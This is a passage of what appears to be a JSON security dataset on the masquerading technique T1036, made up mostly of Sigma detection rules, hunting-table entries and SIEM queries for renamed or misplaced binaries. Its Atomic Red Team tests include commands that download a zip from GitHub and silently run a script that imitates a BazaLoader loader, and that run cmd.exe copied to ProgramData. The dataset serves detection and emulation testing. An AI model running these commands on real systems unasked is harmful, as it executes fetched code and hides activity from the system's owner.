$env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "source": "atomics/T1036/T1036.yaml", + "name": "Atomic Red Team Test - Masquerading" + }, + { + "command": "*.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\Recycle.bin", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\All Users\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\Default\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\Public\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Perflogs\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\config\\systemprofile\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Windows\\Fonts\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Windows\\IME\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Windows\\addins\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\ProgramData\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "csrsr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "csrss.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "!=*\\Windows\\System32\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "cssrss.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "explorer.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "iexplore.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "isass.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lexplore.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lsm.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lssass.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "mmc.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "!=wininit.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lsass", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "run32dll.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "rundII.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "scvhost.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "smss.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "!=services.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "svchost.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "svchosts.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036", + "display_name": "Masquerading", + "atomic_tests": [ + { + "name": "System File Copied to Unusual Location", + "auto_generated_guid": "51005ac7-52e2-45e0-bdab-d17c6d4916cd", + "description": "It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "cleanup_command": "remove-item \"$env:allusersprofile\\cmd.exe\" -force -erroraction silentlycontinue", + "name": "powershell" + } + }, + { + "name": "Malware Masquerading and Execution from Zip File", + "auto_generated_guid": "4449c89b-ec82-43a4-89c1-91e2f1abeecc", + "description": "When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "Location of zip file", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip" + } + }, + "dependencies": [ + { + "description": "Zip file must be present.", + "prereq_command": "if (Test-Path $env:userprofile\\Downloads\\T1036.zip) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -OutFile \"$env:userprofile\\Downloads\\T1036.zip\" #{url}\n" + } + ], + "executor": { + "command": "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "cleanup_command": "taskkill /IM Calculator.exe /f >$null 2>$null\nRemove-Item $env:userprofile\\Downloads\\T1036 -recurse -ErrorAction Ignore", + "name": "powershell" + } + } + ] + }, + { + "chain_id": "100002", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Recycle.bin", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100003", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\All Users\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100004", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\Default\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100005", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\Public\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100006", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Perflogs\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100007", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\config\\systemprofile\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100008", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Windows\\Fonts\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100009", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Windows\\IME\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100010", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Windows\\addins\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100011", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\ProgramData\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100021", + "os": "windows", + "parent_process": "csrsr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100022", + "os": "windows", + "parent_process": "csrss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100023", + "os": "windows", + "parent_process": "cssrss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100033", + "os": "windows", + "parent_process": "explorer.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100035", + "os": "windows", + "parent_process": "iexplore.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100036", + "os": "windows", + "parent_process": "isass.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100037", + "os": "windows", + "parent_process": "lexplore.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100038", + "os": "windows", + "parent_process": "lsm.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100039", + "os": "windows", + "parent_process": "lssass.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100040", + "os": "windows", + "parent_process": "mmc.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100050", + "os": "windows", + "parent_process": "!=wininit.exe", + "commandline_string": "", + "sub_process_1": "lsass", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "https://digital-forensics.sans.org/media/dfir_poster_2014.pdf" + }, + { + "chain_id": "100071", + "os": "windows", + "parent_process": "run32dll.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100072", + "os": "windows", + "parent_process": "rundII.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100075", + "os": "windows", + "parent_process": "scvhost.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100077", + "os": "windows", + "parent_process": "smss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100078", + "os": "windows", + "parent_process": "!=services.exe", + "commandline_string": "", + "sub_process_1": "svchost.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100079", + "os": "windows", + "parent_process": "svchosts.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \".doc.\"or process_path contains \".docx.\"or process_path contains \".xls.\"or process_path contains \".xlsx.\"or process_path contains \".pdf.\"or process_path contains \".rtf.\"or process_path contains \".jpg.\"or process_path contains \".png.\"or process_path contains \".jpeg.\"or process_path contains \".zip.\"or process_path contains \".rar.\"or process_path contains \".ppt.\"or process_path contains \".pptx.\")", + "name": "Masquerading Extension" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and (process_path contains \"SysWOW64\"or process_path contains \"System32\"or process_path contains \"AppData\"or process_path contains \"Temp\")and (file_name contains \".exe\"or file_name contains \".dll\"or file_name contains \".bat\"or file_name contains \".com\"or file_name contains \".ps1\"or file_name contains \".py\"or file_name contains \".js\"or file_name contains \".vbs\"or file_name contains \".hta\")", + "name": "Masquerading Location" + } + ], + "possible_detections": [ + { + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "references": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036", + "car.2013-05-009" + ], + "author": "Florian Roth", + "date": "2017/10/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "ps.exe -accepteula" + }, + "condition": "selection" + }, + "falsepositives": [ + "Renamed SysInternals tool" + ], + "level": "high" + }, + { + "title": "Masquerading as Linux crond process", + "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "status": "experimental", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "execve", + "a0": "cp", + "a1": "-i", + "a2": "/bin/sh", + "a3": "*/crond" + }, + "condition": "selection" + }, + "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + { + "title": "Renamed ProcDump", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "experimental", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "references": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump" + ], + "author": "Florian Roth", + "date": "2019/11/18", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "OriginalFileName": "procdump" + }, + "filter": { + "Image": [ + "*\\procdump.exe", + "*\\procdump64.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Procdump illegaly bundled with legitimate software", + "Weird admins who renamed binaries" + ], + "level": "critical" + }, + { + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "experimental", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "references": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100" + ], + "author": "Florian Roth", + "date": "2018/02/22", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\WINWORD.EXE", + "Image": "*\\MicroScMgmt.exe " + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "PowerShell Base64 Encoded Shellcode", + "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "description": "Detects Base64 encoded Shellcode", + "status": "experimental", + "references": [ + "https://twitter.com/cyb3rops/status/1063072865992523776" + ], + "author": "Florian Roth", + "date": "2018/11/17", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*AAAAYInlM*" + }, + "selection2": { + "CommandLine": [ + "*OiCAAAAYInlM*", + "*OiJAAAAYInlM*" + ] + }, + "condition": "selection1 and selection2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "experimental", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", + "references": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/" + ], + "date": "2019/02/23", + "modified": "2019/08/20", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\svchost.exe", + "*\\taskhost.exe", + "*\\lsm.exe", + "*\\lsass.exe", + "*\\services.exe", + "*\\lsaiso.exe", + "*\\csrss.exe", + "*\\wininit.exe", + "*\\winlogon.exe" + ] + }, + "filter": { + "ParentImage": [ + "*\\System32\\\\*", + "*\\SysWOW64\\\\*", + "*\\SavService.exe", + "*\\Windows Defender\\\\*\\MsMpEng.exe" + ] + }, + "filter_null": { + "ParentImage": null + }, + "condition": "selection and not filter and not filter_null" + }, + "falsepositives": [ + "Some security products seem to spawn these" + ], + "level": "low" + }, + { + "title": "Renamed Binary", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "experimental", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27", + "date": "2019/06/15", + "references": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "OriginalFileName": [ + "cmd.exe", + "powershell.exe", + "powershell_ise.exe", + "psexec.exe", + "psexec.c", + "cscript.exe", + "wscript.exe", + "mshta.exe", + "regsvr32.exe", + "wmic.exe", + "certutil.exe", + "rundll32.exe", + "cmstp.exe", + "msiexec.exe", + "7z.exe", + "winrar.exe" + ] + }, + "filter": { + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\powershell_ise.exe", + "*\\psexec.exe", + "*\\psexec64.exe", + "*\\cscript.exe", + "*\\wscript.exe", + "*\\mshta.exe", + "*\\regsvr32.exe", + "*\\wmic.exe", + "*\\certutil.exe", + "*\\rundll32.exe", + "*\\cmstp.exe", + "*\\msiexec.exe", + "*\\7z.exe", + "*\\winrar.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + ], + "level": "medium" + }, + { + "title": "Execution of Renamed PaExec", + "id": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "status": "experimental", + "description": "Detects execution of renamed paexec via imphash and executable product string", + "references": [ + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "FIN7", + "car.2013-05-009" + ], + "date": "2019/04/17", + "author": "Jason Lynch", + "falsepositives": [ + "Unknown imphashes" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Product": [ + "*PAExec*" + ] + }, + "selection2": { + "Imphash": [ + "11D40A7B7876288F919AB819CC2D9802", + "6444f8a34e99b8f7d9647de66aabe516", + "dfd6aa3f7b2b1035b76b718f1ddc689f", + "1a6cca4d5460b1710a12dea39e4a592c" + ] + }, + "filter1": { + "Image": "*paexec*" + }, + "condition": "(selection1 and selection2) and not filter1" + } + }, + { + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "description": "Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "status": "experimental", + "references": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448" + ], + "author": "Florian Roth", + "date": "2019/02/09", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*\\calc.exe *" + }, + "selection2": { + "Image": "*\\calc.exe" + }, + "filter2": { + "Image": "*\\Windows\\Sys*" + }, + "condition": "selection1 or ( selection2 and not filter2 )" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "status": "experimental", + "references": [ + "https://twitter.com/SBousseaden/status/1094924091256176641" + ], + "author": "Florian Roth", + "date": "2019/02/11", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\csc.exe*", + "ParentImage": [ + "*\\wscript.exe", + "*\\cscript.exe", + "*\\mshta.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Executables Started in Suspicious Folder", + "id": "7a38aa19-86a9-4af7-ac51-6bfe4e59f254", + "status": "experimental", + "description": "Detects process starts of binaries from a suspicious folder", + "author": "Florian Roth", + "date": "2017/10/14", + "modified": "2019/02/21", + "references": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/master/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "C:\\PerfLogs\\\\*", + "C:\\$Recycle.bin\\\\*", + "C:\\Intel\\Logs\\\\*", + "C:\\Users\\Default\\\\*", + "C:\\Users\\Public\\\\*", + "C:\\Users\\NetworkService\\\\*", + "C:\\Windows\\Fonts\\\\*", + "C:\\Windows\\Debug\\\\*", + "C:\\Windows\\Media\\\\*", + "C:\\Windows\\Help\\\\*", + "C:\\Windows\\addins\\\\*", + "C:\\Windows\\repair\\\\*", + "C:\\Windows\\security\\\\*", + "*\\RSA\\MachineKeys\\\\*", + "C:\\Windows\\system32\\config\\systemprofile\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Execution in Non-Executable Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious exection from an uncommon folder", + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\$Recycle.bin", + "*\\Users\\All Users\\\\*", + "*\\Users\\Default\\\\*", + "*\\Users\\Public\\\\*", + "C:\\Perflogs\\\\*", + "*\\config\\systemprofile\\\\*", + "*\\Windows\\Fonts\\\\*", + "*\\Windows\\IME\\\\*", + "*\\Windows\\addins\\\\*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious MsiExec Directory", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "experimental", + "description": "Detects suspicious msiexec process starts in an uncommon directory", + "references": [ + "https://twitter.com/200_okay_/status/1194765831911215104" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2019/11/14", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\msiexec.exe" + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWOW64\\\\*", + "C:\\Windows\\WinSxS\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Program Location Process Starts", + "id": "f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5", + "status": "experimental", + "description": "Detects programs running in suspicious files system locations", + "references": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2019/01/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\$Recycle.bin", + "*\\Users\\Public\\\\*", + "C:\\Perflogs\\\\*", + "*\\Windows\\Fonts\\\\*", + "*\\Windows\\IME\\\\*", + "*\\Windows\\addins\\\\*", + "*\\Windows\\debug\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "description": "Detects suspicious process run from unusual locations", + "status": "experimental", + "references": [ + "https://car.mitre.org/wiki/CAR-2013-05-002" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*:\\RECYCLER\\\\*", + "*:\\SystemVolumeInformation\\\\*", + "C:\\\\Windows\\\\Tasks\\\\*", + "C:\\\\Windows\\\\debug\\\\*", + "C:\\\\Windows\\\\fonts\\\\*", + "C:\\\\Windows\\\\help\\\\*", + "C:\\\\Windows\\\\drivers\\\\*", + "C:\\\\Windows\\\\addins\\\\*", + "C:\\\\Windows\\\\cursors\\\\*", + "C:\\\\Windows\\\\system32\\tasks\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2017/08/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\svchost.exe" + }, + "filter": { + "ParentImage": [ + "*\\services.exe", + "*\\MsMpEng.exe", + "*\\Mrt.exe", + "*\\rpcnet.exe" + ] + }, + "filter_null": { + "ParentImage": null + }, + "condition": "selection and not filter and not filter_null" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Taskmgr as LOCAL_SYSTEM", + "id": 